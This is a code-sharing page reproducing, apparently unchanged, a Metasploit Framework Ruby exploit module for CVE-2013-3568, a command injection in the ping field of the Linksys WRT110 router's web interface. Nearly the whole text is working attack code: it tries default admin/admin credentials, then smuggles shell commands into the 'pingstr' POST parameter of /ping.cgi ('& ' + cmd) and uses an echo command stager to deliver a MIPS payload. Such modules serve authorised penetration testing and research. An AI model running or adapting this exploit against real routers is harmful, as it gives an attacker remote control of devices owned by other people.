扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerEcho def initialize(info = {}) super(update_info(info, 'Name'=> 'Linksys WRT110 Remote Command Execution', 'Description' => %q{ The Linksys WRT110 consumer router is vulnerable to a command injection exploit in the ping field of the web interface. }, 'Author'=> [ 'Craig Young', # Vulnerability discovery 'joev <jvennix[at]rapid7.com>', # msf module 'juan vazquez' # module help + echo cmd stager ], 'License' => MSF_LICENSE, 'References'=> [ ['CVE', '2013-3568'], ['BID', '61151'], ['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] ], 'DisclosureDate' => 'Jul 12 2013', 'Privileged' => true, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSLE, 'Targets'=> [ ['Linux mipsel Payload', { } ] ], 'DefaultTarget'=> 0, )) register_options([ OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/HNAP1/' }) rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe end if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit test_login! execute_cmdstager end # Sends an HTTP request with authorization header to the router # Raises an exception unless the login is successful def test_login! print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}") res = send_auth_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if not res or res.code == 401 or res.code == 404 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}") else print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}") end end # Run the command on the router def execute_command(cmd, opts) send_auth_request_cgi({ 'uri' => '/ping.cgi', 'method' => 'POST', 'vars_post' => { 'pingstr' => '& ' + cmd } }) Rex.sleep(1) # Give the device a second end # Helper methods def user; datastore['USERNAME']; end def pass; datastore['PASSWORD'] || ''; end def send_auth_request_cgi(opts={}, timeout=nil) timeout ||= datastore['TIMEOUT'] opts.merge!('authorization' => basic_auth(user, pass)) begin send_request_cgi(opts, timeout) rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end end |
体验盒子
